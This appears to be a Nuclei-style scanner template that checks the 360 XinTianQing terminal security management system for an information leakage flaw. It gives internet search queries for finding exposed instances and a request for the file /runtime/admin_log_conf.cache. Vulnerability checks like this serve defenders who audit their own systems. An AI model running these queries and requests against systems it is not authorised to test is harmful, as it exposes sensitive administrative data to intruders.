id: 360-XinTianQing

info:
  name: 360 XinTianQing Terminal Security Management System Information Leakage Vulnerability
  author: Zero Trust Security Attack and Defense Laboratory
  severity: medium
  description: |
    360-XinTianQing There is an information leakage vulnerability in the terminal security management system. Hackers can obtain sensitive information through vulnerabilities
  metadata:
    fofa-query: title="360新天擎"
    hunter-query: web.title="360新天擎"


http:
  - method: GET
    path:
      - "{{BaseURL}}/runtime/admin_log_conf.cache"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "security"

      - type: status
        status:
          - 200
